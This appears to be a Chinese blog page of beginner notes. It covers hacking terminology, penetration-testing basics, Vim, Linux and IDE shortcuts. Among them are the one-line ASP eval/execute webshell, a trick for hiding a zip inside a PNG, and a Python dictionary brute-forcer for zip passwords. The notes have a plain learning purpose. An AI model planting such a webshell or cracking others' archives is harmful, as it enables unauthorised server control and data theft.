Fork me on GitHub

发表于 | 更新于 | 评论数:

代码命令

代码 作用
input type=”text” name=”username” value=”” 输入账号
input type=”text”name=”password” value=”” 输入密码
input type=”submit” 提交查询按钮
input type=”reset” 重置

发表于 | 更新于 | 评论数:

专业术语

  • 脚本 (asp、 php、 jsp)
  • html (css、 js、 html)
  • HTTP协议
  • CMS (B/S)

  • MD5

  • 肉鸡 : 被黑客入侵并长期驻扎的计算机服务器

  • 抓鸡 : 利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为
  • Webshell : 通过 Web 入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制

  • 漏洞 : 硬件、软件、协议等可利用安全缺陷,对数据进行篡改、控制等

  • 提权 : 操作系统低权限的账户将自己提升为管理员权限使用的方法

  • 后门: 黑客为对主机进行长期的控制,在机器上种植的一段程序或留下的一个”入口”

  • 跳板 : 使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息

  • 旁站 : 对于一个大的服务器,可以供多个网站使用

  • 旁站入侵 : 同服务器下的网站入侵,可以通过提权跨目录等手段拿到目标网站的权限。

    • 常见旁站查询工具: WebRoot、御剑、明小子、Web在线查询等。

  • C段入侵 : 同C段下服务器入侵。如目标Ip为192.168.1.253入侵192.168.1.*的任意一台机器,然后借助一些黑客工具嗅探获取网络上传输的各种信息。

    • 常见工具: Cain (windows) 、 Sniffit、Snoop、Tcpdump、Dsniff(Unix)

渗透测试

  1. 黑盒测试 : 在未授权的情况下,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能存在的安全风险

黑盒测试不同于黑客攻击,并不等于黑站。黑盒测试考验的是综合的能力 (OS,Database,Script,code,思路,社工)

思路和经验积累往往决定成败

  1. 黑白盒 : 知道源代码和不知道源代码的渗透测试

黑盒测试为传统的渗透测试,而白盒测试偏向于代码审计

  1. 渗透测试与入侵的区别
  • 渗透测试:更全面的找出服务器的问题,倾向于保护
  • 入侵:不择手段的拿到权限

黑客攻击

  1. DDoS 攻击 : 分布式拒绝服务攻击 (distributed denial-of-service attack)

缺陷: 无法贡献系统

  1. DNS污染 : DNS (Domain Name System 域名系统) Poisoning

小结

木马:

通过向服务端提交一句简短的代码,配合本地客户端,实现webshell功能的木马

1
2
<%eval request("pass")%>
<%execute(request("pass"))%>
解释
  1. request(“pass”) : 接收客户端提交的数据, pass 为执行命令的参数值
  2. eval/execute : 函数执行客户端命令的内容

黑客之路 一

隐写术

步骤

  1. 准备一个文件 ,如 test.txt (test.txt是需要被隐藏的文件)
  2. 将其压缩为zip , 或 rar,直接重命名
  3. 打开命令终端,将压缩文件定向到需要被隐写的文件
  4. (可选操作)将被隐写的文件的拓展名修改为 .zip

作用

将test.txt文件定向隐藏至hide.png文件下,即点击图片,其实打开的是test.txt

代码

cat test.txt.zip >> hide.png

使用 Python3 编写破解 zip 压缩包密码

用料:

  • 准备需要破解的 zip 文件,找一个密码字典 【可自行制作】
  • 运行脚本

读取一个Python zipfile 模块

这里假设filename是一个文件的路径:

1
2
3
4
import zipfile 
z = zipfile.ZipFile(filename, 'r') 
for i in z.infolist(): 
print i.file_size, i.header_offset

这里使用了z.infolist(), 它返回的就是压缩包内所有文件的信息,就是一个ZipInfo的列表。一个ZipInfo对象中包含了压缩包内一个文件的信息,其中比较常用的是 filename, file_size, header_offset, 分别为文件名,文件大小,文件数据在压缩包中的偏移

已知密码进行解压

代码

1
2
3
4
5
import zipfile #导入模块,它是做压缩和解压缩的
password="123" #我们设定的口令
zfile = zipfile.ZipFile("test.zip") #要解压缩的压缩包
zfile.extractall(path='C:\\Users\\Administrator\\Desktop\\', members=zfile.namelist(), pwd=password.encode('utf-8'))
#进行解压缩操作,path为输出的路径

运行一下上面的代码(当然你的加密口令要为123),会发现在桌面上已经把test.zip解压出来了

破解开始

直接上代码

1
2
3
4
5
6
7
8
9
10
import zipfile 
zfile = zipfile.ZipFile("test.zip")
passFile=open('pwd.txt') #读取你设定的密码文件
for line in passFile.readlines():
  try:
    password = line.strip('\n')
    zfile.extractall(path='C:\\Users\\Administrator\\Desktop\\', members=zfile.namelist(), pwd=password.encode('utf-8'))
    break
  except:
    print("密码错误")

利用了try except异常机制,当解压正常的时候就正常密码正常,解压失败会报出异常

发表于 | 更新于 | 分类于 | 评论数:
命令 功能
h 向左
j 向下
k 向上
l 向右
行内移动命令 作用
w 向后移动一个单词
b 向前移动一个单词
0 迅速回到行首
^ 回到行首,第一个不是空白字符的位置
$ 回到行尾
行数移动命令 英文 作用
gg go 回到文件顶部
G GO 回到文件末尾
数字gg go 移动到 数字 对应行数
数字G go 移动到 数字 对应行数
:数字 移动到 数字 对应行数
屏幕移动 英文 功能
Ctrl+b back 向上翻页
Ctrl+f forwarf 向下翻页
ctrl + H Head 屏幕顶部
ctrl + M Middle 屏幕中间
ctrl + L Low 屏幕底部
编辑命令 英文 作用
i 进入编辑模式
esc 退出
y copy 复制
yy copy 复制一行,多行复制可以nyy,如 2 YY
p paste 粘贴
u 撤销上一步的操作
Ctrl+r 恢复上一步被撤销的操作
dd Delete 删除,实际上是剪贴,将删除内容放入文本缓冲区中
缩放命令
ctrl + shift + = 放大
Ctrl + - 缩小
常用Linux命令 英文 作用
ls list 查看当前文件夹下的内容
pwd print work directory 查看当前所在文件夹
cd change directory 切换文件夹
touch touch 新建文件
mkdir make directory 创建目录
rm [-r] remove 删除指定的文件或目录
clear clear 清屏

终端命令格式

command [-0ptions] [parameter]

  • command : 命令名,相应功能英语缩写
  • -Options: 选项,可以对命令进行控制,也可以省略
  • parameter: 传递给命令的参数,可以为多个

发表于 | 更新于 | 分类于 | 评论数:

CTRL + F 搜索功能
CTRL + D 复制一行代码
CTRL + Y 删除一行代码
在任意位置按住shift + 回车 快速换行
CTRL + / 批量注释与取消
选中代码 + tab 批量缩进
SHIFT + tab 批量取消缩进
CTRL + R 代码替换
CTRL + - (+)代码折叠(代码展开)
CTRL + SHIFT -(+) 代码完全折叠(展开)
CTRL + 鼠标左击 查看源代码

TODO 记录要做的事情

Ctrl+\ 全屏模式
Alt”+”R”运行脚本